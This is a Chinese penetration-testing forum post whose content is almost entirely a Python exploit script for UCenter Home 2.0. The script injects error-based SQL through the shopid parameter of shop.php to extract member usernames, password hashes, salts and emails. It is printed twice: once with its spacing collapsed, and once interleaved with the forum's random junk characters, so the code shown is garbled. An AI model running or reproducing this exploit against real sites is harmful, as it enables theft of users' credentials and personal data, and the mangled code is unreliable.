找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 UCenter Home 2.0 EXP
返回列表 发新帖
查看: 2383|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 EXP

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-23 09:18:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl' ~; Q6 A: y$ N! R- T) \% S

8 p8 o% U- |5 M' {% Y4 Z( @" C1 N
, s1 K( i; _2 \! M#!/usr/bin/env python  
7 O6 u. i4 ^; P# {' N% D % C7 \* u* `$ J. |
import sys  ) Y1 `0 C% r; r. ?0 y! G' @3 k
import urllib2  
$ O1 O- Y3 G7 n7 {* mimport re  
* a0 T( o- }7 o0 A  t
$ u2 U& P+ P( m# d" Z3 G7 i" W7 jdef info():  
! l% L6 Y% |7 l' w2 B    print 'From:http://www.exploit-db.com/exploits/14997/'
: a5 ^4 |# q) P! A+ t    print 'http://www.hake.cc/Web_loudong/'
$ `; d$ E/ x- o0 l' M5 f    print 'changed:qiaoy'  ' P8 g% N  n7 `1 G8 F" Z
    print 'exp:'  ; \6 ?, ~5 N7 B0 r
    print ' ./UCenter_Home_2.0.py site'  
: e% B' D5 a7 i2 m. l  o
$ |# K7 \# }# g2 F, d5 cdef main():  6 J( W8 O3 H* |% z
    if len(sys.argv) != 2:  
0 A9 n. N5 T" ~/ _3 S/ }1 Y( {: I        info()  
# }) p& X% U6 X" g: X9 Z    else:  
# x, ?4 [* e1 u        site = sys.argv[1]  
- @4 B: U3 N! N' s! h- h        if site[0:7] == 'http://':  & A. T9 J% F% I, J
            sitesite =site  
. T- V% G: f7 E8 U2 _        elif site[0:8] == 'https://':  
# x% Q& V# t7 k$ w# u9 N            sitesite = site  + `' B6 e" n- O6 N# S) \# B
        else:  ) Q% u! q. B& U8 v. O3 |/ q
            site = 'http://'+site  " q7 }, N$ U( Y* ]
        try:  ' D3 g& n- L* F3 o
            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'  
- a7 `$ }& K* N- r1 T            Value = urllib2.urlopen(url).read()  
, U/ l5 S2 b1 R* o  e( a# [3 T! A+ Z- x/ o            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]  & r+ D: z: S/ o4 o- j6 ?3 x" f& C
            hacked = Msg.split(':')  ' u9 x5 X7 z0 z) m1 r. h3 b, h' J2 p
            print 'Name:    '+hacked[1]  " X6 z" t7 U2 l& @; _8 O6 W& w7 `
            print 'Passwd:  '+hacked[2]  
% R. D7 V+ f- i            print 'salt:    '+hacked[3]  + `( Z, V) i0 [1 c- x! x
            print 'email:   '+hacked[4]  
, j; N: e% T* Z: y- J- I3 K        except:  : @( B; u9 A0 `( M9 k9 C
            print 'Sorry,I can\'t work............'  " X/ u2 G3 M  N) Z5 w: t

+ b, |/ a0 O, z+ ?2 Aif __name__ == '__main__':  + b' u5 T3 k% C" l; m, c5 D
    main()
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表